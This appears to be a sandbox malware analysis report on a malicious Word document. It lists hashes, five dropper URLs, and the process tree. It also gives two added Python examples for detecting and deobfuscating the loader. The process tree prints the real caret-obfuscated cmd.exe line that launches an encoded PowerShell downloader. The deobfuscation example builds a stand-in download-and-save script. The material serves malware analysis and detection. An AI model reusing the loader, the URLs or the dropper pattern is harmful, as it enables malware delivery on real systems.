Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
  • submitted
    25-05-2024 06:08

General

  • Target

    71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc

  • Size

    76KB

  • MD5

    71136aab6cae39e138fab55e2f00a583

  • SHA1

    164bc374e50c579c0557ec32cd573afc907db362

  • SHA256

    aba5bddcd0584140102c5a904be47f3025b6ba796114bbd2039e272bf26d7be7

  • SHA512

    c1ed00716505531ef2a2c60ddd0e06e9a1bba03f10483a18f5eab07e91cd4283ebf03ea9f100d34657821e30cb1f17d0e0a273824cddeab4addef4523be7300e

  • SSDEEP

    1536:3nptJlmrJpmxlRw99NBq+ax4+6MT4I6Dhl93tCX:Zte2dw99fUn8

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://tresillosmunoz.com/2HB

exe.dropper

http://tonyleme.com.br/8l3XcSKQ

exe.dropper

http://sg2i.com/wwG

exe.dropper

http://lunacine.com/CQ

exe.dropper

http://www.yuanjhua.com/OwUzt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
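The two behavioural signatures that carry the verdict here, an Office process starting a command interpreter and a caret-heavy cmd.exe command line, reduce to a few checks on process-creation telemetry (parent image, child image, command-line shape). The following is an added example, not part of the sandbox report or its signature set: it runs those checks over a constructed list of process-creation events shaped like the tree in the Processes section. PIDs, image paths, the explorer.exe and chrome.exe records, and the abbreviated command lines are made up for illustration; splwow64.exe is whitelisted because Office legitimately starts it on 64-bit Windows, as the tree shows.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe", "mspub.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
EXPECTED = {"splwow64.exe"}  # 32-bit print-driver host that Office starts on 64-bit Windows
# -EncodedCommand and its documented short forms (-e, -ec) plus any -en... prefix.
ENC_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s")


@dataclass(frozen=True)
class Proc:
    """One process-creation event (the fields a Sysmon Event ID 1 record would give)."""
    pid: int
    image: str
    cmdline: str
    ppid: int


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def caret_ratio(cmdline: str) -> float:
    """Fraction of '^' escape characters; benign command lines sit near zero."""
    return cmdline.count("^") / max(len(cmdline), 1)


def office_ancestor(proc: Proc, table: Dict[int, Proc]) -> Optional[Proc]:
    """Walk the parent chain and return the nearest Office ancestor, or None."""
    seen = set()
    cur = table.get(proc.ppid)
    while cur is not None and cur.pid not in seen:
        if basename(cur.image) in OFFICE:
            return cur
        seen.add(cur.pid)
        cur = table.get(cur.ppid)
    return None


def evaluate(events: List[Proc]) -> Dict[int, List[str]]:
    """Map PID -> list of findings for every process that descends from an Office parent."""
    table = {p.pid: p for p in events}
    findings: Dict[int, List[str]] = {}
    for p in events:
        anc = office_ancestor(p, table)
        name = basename(p.image)
        if anc is None or name in EXPECTED:
            continue
        hits = []
        if name in INTERPRETERS:
            # Direct child of the Office process vs. further down the chain (cmd -> powershell).
            hits.append("office_spawned_interpreter" if p.ppid == anc.pid
                        else "interpreter_descends_from_office")
        if caret_ratio(p.cmdline) > 0.05:
            hits.append("caret_obfuscated_cmdline")
        if name in {"powershell.exe", "pwsh.exe"} and ENC_RE.search(p.cmdline):
            hits.append("encoded_powershell")
        if hits:
            findings[p.pid] = hits
    return findings


# Constructed events mirroring the report's process tree (values are illustrative, not logged data).
SAMPLE_EVENTS = [
    Proc(1000, r"C:\Windows\explorer.exe", "explorer.exe", 800),
    Proc(2408, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\invoice.doc"', 1000),
    Proc(1400, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288", 2408),
    Proc(2804, r"C:\Windows\SysWOW64\Cmd.exe",  # staged value abbreviated
         'Cmd /V/C"^s^e^t N^Y^GD==A^A^I^AAC&&^f^or /^L %^O ^in (9^0^5,^-1,0)^do ^s^et ^q0=!^q0!!N^Y^GD:~%^O,1!'
         '&&^i^f %^O ^l^e^q ^0 ca^l^l %^q0:^~^4%"', 2408),
    Proc(2868, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         "powershell -e JABGAG0AaQA9AA==", 2804),
    Proc(3100, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe --type=renderer", 1000),
]


def analyze_sample() -> Dict[int, List[str]]:
    return evaluate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, hits in sorted(analyze_sample().items()):
        print(pid, ", ".join(hits))
```

Walking the full ancestor chain rather than checking only the immediate parent is what catches the powershell.exe stage, which is two hops from WINWORD.EXE; a rule keyed on parent image alone would see only cmd.exe as the parent and miss it.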

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\71136aab6cae39e138fab55e2f00a583_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2408
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1400
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd /V/C"^s^e^t N^Y^GD==A^A^I^AAC^A^gA^A^I^A^AC^Ag^AA^IA^AC^AgAAI^AAC^A^g^AAIAAC^Ag^AAIA^AC^A^9BQf^AsH^AoBwY^A^QH^A^hBw^Y^A^0^H^A^7^A^w^a^AEGA^lBgcA^IG^A7^AQ^d^AIH^A^EB^AJAAC^At^BQ^ZAQHA^J^B^Q^LAUGArB^w^bAY^HAu^B^Q^S^As^D^A^p^AQd^AIH^AEB^A^JAAC^As^Aw^a^AkG^A^H^B^A^J^AgCAlB^Ab^AkGA^G^BAZAEGAvB^A^bA^4^G^A3Bw^b^AQE^A^uA^Q^a^A^0GA^GB^AJAsH^A5^BgcA^Q^HA^7B^QK^A^sG^AW^B^wSAQC^A^gAgb^A^kG^AgA^w^aA^kGAHBAJA^gCA^o^BwY^AE^G^Al^BgcA^8GA^m^Bw^O^AcCAl^BAeAU^G^A^uAwJAsCA1^Bw^QAoH^AkA^wKAcCAcBwJA^sC^A^j^BQaA^w^G^AiB^Qd^A^AH^A^6^Ag^d^A4^GAl^B^AJ^A0^DA^1BgcAQ^E^AkA^wO^AcCA^2^Ag^M^AUD^AnAAIA^0^D^Ag^A^Qd^A^MEA6B^A^JAsD^ApA^wJ^AA^EAnA^A^KA^QHAp^B^AbA^AH^ATB^g^L^AcC^A^0Bg^eAU^FA^3^BwTA^8CAt^Bw^bAMGA^u^A^QYAUHA^o^Bg^a^A4^GA^h^B^QdAkH^AuA^w^dAcHA^3B^wL^A^8C^A6AAc^AQ^H^A0^BAaAAEAR^Bw^Q^A^8C^A^tB^wbA^M^G^AuAQ^Z^A4GA^pB^wY^A^E^G^Au^BQ^d^A^wGAvAw^LAoDAw^BA^d^AQH^Ao^B^A^Q^AcEA^3^B^w^dA8C^At^Bw^bAM^G^A^u^A^QaA^IDAnB^wcA8C^AvAgO^A^A^H^A0^B^AdAg^GA^ABQ^U^A^s^EA^TB^wYAg^FAz^AAbA^gD^AvAgc^AIGA^u^AQbA8G^A^jB^gLAU^GAtBQ^ZA^w^GA5Bgb^A8^G^A^0^BwL^A^8C^A^6^A^AcAQH^A^0BAa^AA^EACB^ASAI^D^Av^A^Qb^A^8^GA^jB^gLAoH^Av^BgbAU^H^A^tBwc^A^8^GA^s^BA^b^A^kGAzBQZA^IH^A0B^w^LA8CA6^AAcA^QHA^0B^A^aAcCA9A^waA^Y^FAL^B^A^J^A^sD^A0B^g^b^AU^G^A^p^B^A^bA^M^E^A^i^B^QZAc^FAu^A^A^dA^U^GA^OBA^IA^QH^Aj^B^Q^ZAoGA^i^Bw^b^A0C^A^3BQ^Z^A^4GA9^AQa^A^0GAGBA^J e- ll^ehsr^e^wop&&^f^or /^L %^O ^in (9^0^5,^-1,0)^do ^s^et ^q0=!^q0!!N^Y^GD:~%^O,1!&&^i^f %^O ^l^e^q ^0 ca^l^l %^q0:^~^4%"
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e 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
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2868
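The cmd.exe line above is a reversal loader: the carets are cmd's escape character and vanish before execution, the first `set` stores a backwards `powershell -e <base64>` string, the `for /L` loop copies it back one character at a time from the highest index down to 0, and `call %q0:~4%` runs the rebuilt string from a substring offset. The encoded argument is base64 of UTF-16LE text, which is where the dropper URLs listed under Malware Config come from. The following is an added example, not tooling from the report or the sandbox vendor: it emulates those cmd semantics (caret removal, `for /L` bounds, `%var:~N%` slicing), decodes the PowerShell stage and pulls the URLs out. The payload it works on is constructed by `build_sample_cmdline`, which assembles a line in the same shape with a made-up script and `example.invalid` hosts; the four-character filler it appends is what the `~4` step has to skip in that constructed line. Only the simple caret case (no `^^` pairs, no escaped metacharacters) is handled, which is all this sample uses.

```python
import base64
import re
from typing import List, Optional, Tuple

URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# powershell -e / -ec / -en... <base64>: the documented short forms of -EncodedCommand
ENC_RE = re.compile(r"(?i)powershell(?:\.exe)?\s+-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)")


def strip_carets(s: str) -> str:
    """cmd removes '^' before running the line, so the carets only defeat string matching."""
    return s.replace("^", "")


def for_l_indices(start: int, step: int, end: int) -> range:
    """Index sequence of `for /L %x in (start,step,end)`; (905,-1,0) counts 905 down to 0."""
    if step == 0:
        return range(0)
    return range(start, end + (1 if step > 0 else -1), step)


def cmd_substring(value: str, expr: str) -> str:
    """Emulate `%var:~N%`, `%var:~-N%` and `%var:~N,M%` (negative M counts from the end)."""
    parts = [int(p) for p in expr.split(",")]
    if len(parts) == 1:
        return value[parts[0]:]
    start, length = parts
    return value[start:length] if length < 0 else value[start:][:length]


def deobfuscate_cmd(cmdline: str) -> str:
    """Rebuild the command that `call` finally executes from a set / for /L / call reversal line."""
    flat = strip_carets(cmdline)
    m_set = re.search(r"set (\w+)=(.*?)&&", flat)            # first set: the staged (reversed) string
    m_for = re.search(r"for /L %(\w) in \((-?\d+),(-?\d+),(-?\d+)\)", flat)
    m_call = re.search(r"call %(\w+):~(-?\d+(?:,-?\d+)?)%", flat)
    if not (m_set and m_for and m_call):
        raise ValueError("not the set / for /L / call reversal pattern")
    staged = m_set.group(2)
    start, step, end = (int(x) for x in m_for.groups()[1:])
    # Each iteration appends !VAR:~%O,1!; an index past the end of the string yields "".
    rebuilt = "".join(staged[i] for i in for_l_indices(start, step, end) if 0 <= i < len(staged))
    return cmd_substring(rebuilt, m_call.group(2))


def decode_encoded_powershell(cmd: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the script as UTF-16LE text."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def extract_urls(script: str) -> List[str]:
    return URL_RE.findall(script)


def recover(cmdline: str) -> Tuple[str, Optional[str], List[str]]:
    """Obfuscated cmd line -> (inner command, decoded script or None, URLs found in it)."""
    inner = deobfuscate_cmd(cmdline)
    script = decode_encoded_powershell(inner)
    return inner, script, extract_urls(script) if script else []


# Constructed stand-in for the real stage: made-up script, reserved .invalid hosts.
SAMPLE_SCRIPT = ("$w=new-object Net.WebClient;"
                 "foreach($u in 'http://stage1.example.invalid/a','http://stage2.example.invalid/b')"
                 "{try{$w.DownloadFile($u,$env:TEMP+'\\s.exe');break}catch{}}")


def build_sample_cmdline(script: str = SAMPLE_SCRIPT, filler: str = "Xk2q") -> str:
    """Assemble a line in the sample's shape: reversed 'powershell -e <b64>' plus a
    4-character filler that `%q0:~4%` drops, carets sprinkled in, for /L bounds set
    to the staged string's length."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode()
    staged = ("powershell -e " + b64)[::-1] + filler
    noisy = "".join(("^" if i % 3 == 0 else "") + c for i, c in enumerate(staged))
    return ('Cmd /V/C"^s^e^t N^Y^GD=' + noisy +
            '&&^f^or /^L %^O ^in (' + str(len(staged) - 1) + ',^-1,0)^do ^s^et ^q0=!^q0!!N^Y^GD:~%^O,1!'
            '&&^i^f %^O ^l^e^q ^0 ca^l^l %^q0:^~^4%"')


if __name__ == "__main__":
    inner, script, urls = recover(build_sample_cmdline())
    print(inner[:40] + "...")
    print(script)
    print(urls)
```

To apply it to the logged line, pass the cmd.exe command line from the process tree to `recover()`; the loop bounds and the `~4` offset are read from the line itself rather than assumed, so the same function works on variants that change the variable names, the loop start or the substring.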

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      1dbaecd3b87de2efba212e35c56e986d

      SHA1

      31efdf0a47f8ff5753475853c956b6a5ac013992

      SHA256

      6a6d97fee855fd0d38bd07b71ef3c56a68b758f1a54ae0acac8d6e1b0c200c43

      SHA512

      069ee7a15f399428b9405e7f3d43f0e11ecd7ee08a4aa061bf9078ba7f19cbb10c4b80fae61a1601500d204cacb4d6eca40f7688d9aa82fe4d2eecd21bcee487

    • C:\Users\Admin\AppData\Local\Temp\Cab456B.tmp

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\Local\Temp\Tar49C2.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      da5f36dad8bcc407e5edaba05755e779

      SHA1

      b94bc2758eba2bec74d8b8951456732f1e2d4cdb

      SHA256

      8fe2ef7c233e97c57692abe63d1514fed6897c084c2527821fffb6a8b600079c

      SHA512

      5e35b7be15358dfe4b7360c3495bec001ceab5e942094ca4c8c7d65e727195b8a52bb90364811edf74b6fa3e0c509a3a26977db742e5141086da18813b61455f

    • memory/2408-10-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-31-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-9-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-0-0x000000002F5F1000-0x000000002F5F2000-memory.dmp

      Filesize

      4KB

    • memory/2408-11-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-12-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-14-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-15-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-30-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-26-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-33-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-8-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-18-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-22-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-125-0x00000000719CD000-0x00000000719D8000-memory.dmp

      Filesize

      44KB

    • memory/2408-124-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2408-7-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-6-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-2-0x00000000719CD000-0x00000000719D8000-memory.dmp

      Filesize

      44KB

    • memory/2408-108-0x00000000719CD000-0x00000000719D8000-memory.dmp

      Filesize

      44KB

    • memory/2408-109-0x0000000000350000-0x0000000000450000-memory.dmp

      Filesize

      1024KB

    • memory/2408-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2868-41-0x0000000006020000-0x000000000605A000-memory.dmp

      Filesize

      232KB

    • memory/2868-40-0x0000000005FA0000-0x0000000005FD8000-memory.dmp

      Filesize

      224KB